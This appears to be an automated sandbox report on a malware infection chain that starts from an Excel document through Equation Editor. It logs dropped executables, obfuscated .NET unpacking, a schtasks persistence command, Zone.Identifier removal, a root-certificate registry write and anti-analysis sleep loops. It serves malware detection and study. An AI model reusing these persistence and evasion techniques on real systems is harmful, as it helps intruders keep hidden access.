Source: C:\Users\Public\vbc.exe	Command line argument: sfxname	4_2_0027CBB8
Source: C:\Users\Public\vbc.exe	Command line argument: sfxstime	4_2_0027CBB8
Source: C:\Users\Public\vbc.exe	Command line argument: STARTDLG	4_2_0027CBB8

Source: 6.2.RegSvcs.exe.340000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 6.2.RegSvcs.exe.340000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 6.2.RegSvcs.exe.340000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 13.2.RegSvcs.exe.2d0000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 13.2.RegSvcs.exe.2d0000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 13.2.RegSvcs.exe.2d0000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: vbc.exe, 00000004.00000000.447066106.0000000000292000.00000002.00020000.sdmp, vbc.exe.2.dr
Source:	Binary string: C:\Windows\RegSvcs.pdbpdbvcs.pdbegSvcs.pdb source: RegSvcs.exe, 00000006.00000002.666190763.000000000083D000.00000004.00000020.sdmp
Source:	Binary string: RegSvcs.pdb source: RegSvcs.exe, RegSvcs.exe, 0000000D.00000002.536198075.0000000000DA2000.00000020.00020000.sdmp, RegSvcs.exe.5.dr

Data Obfuscation:

.NET source code contains potential unpacker

Source: 6.2.RegSvcs.exe.340000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs	.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 6.2.RegSvcs.exe.340000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 13.2.RegSvcs.exe.2d0000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 13.2.RegSvcs.exe.2d0000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs	.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\Public\vbc.exe	Code function: 4_2_0027E336 push ecx; ret	4_2_0027E349
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0027D870 push eax; ret	4_2_0027D88E
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FC6BD5 push ecx; ret	5_2_00FC6BE8

Contains functionality to dynamically determine API calls

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

Code function: 5_2_00FBEE30 LoadLibraryA,GetProcAddress,

5_2_00FBEE30

File is packed with WinRar

Source: C:\Users\Public\vbc.exe

File created: C:\Users\user\33920049\__tmp_rar_sfx_access_check_4531298

Jump to behavior

Source: 6.2.RegSvcs.exe.340000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs	High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
Source: 6.2.RegSvcs.exe.340000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs	High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 13.2.RegSvcs.exe.2d0000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs	High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 13.2.RegSvcs.exe.2d0000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs	High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'

Persistence and Installation Behavior:

Drops PE files with a suspicious file extension

Source: C:\Users\Public\vbc.exe

File created: C:\Users\user\33920049\mmuiqlcvwo.pif

Jump to dropped file

Drops PE files

Source: C:\Users\Public\vbc.exe	File created: C:\Users\user\33920049\mmuiqlcvwo.pif	Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe	Jump to dropped file
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	File created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\asdERTYgh56F[1].exe	Jump to dropped file

Drops PE files to the user directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe

Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp7677.tmp'

Drops PE files to the user root directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe

File opened: C:\Users\user\AppData\Local\Temp\RegSvcs.exe:Zone.Identifier read attributes | delete

Jump to behavior

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FE43FF GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,		5_2_00FE43FF
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_0102A2EA IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		5_2_0102A2EA

Stores large binary data to the registry

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: mmuiqlcvwo.pif PID: 2516, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mmuiqlcvwo.pif PID: 2568, type: MEMORYSTR

Yara detected AntiVM autoit script

Source: Yara match	File source: Process Memory Space: mmuiqlcvwo.pif PID: 2516, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mmuiqlcvwo.pif PID: 2568, type: MEMORYSTR

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2796	Thread sleep time: -300000s >= -30000s	Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif TID: 2620	Thread sleep count: 4838 > 30	Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif TID: 2620	Thread sleep time: -48380s >= -30000s	Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif TID: 2620	Thread sleep count: 113 > 30	Jump to behavior
Source: C:\Windows\System32\taskeng.exe TID: 236	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif TID: 1580	Thread sleep count: 3937 > 30	Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif TID: 1580	Thread sleep time: -39370s >= -30000s	Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif TID: 1580	Thread sleep count: 110 > 30	Jump to behavior

Sleep loop found (likely to delay execution)

Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Thread sleep count: Count: 4838 delay: -10			Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Thread sleep count: Count: 3937 delay: -10			Jump to behavior

Contains long sleeps (>= 3 min)

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Window / User API: threadDelayed 4838	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Window / User API: threadDelayed 7950	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Window / User API: threadDelayed 1761	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Window / User API: foregroundWindowGot 749	Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Window / User API: threadDelayed 3937	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
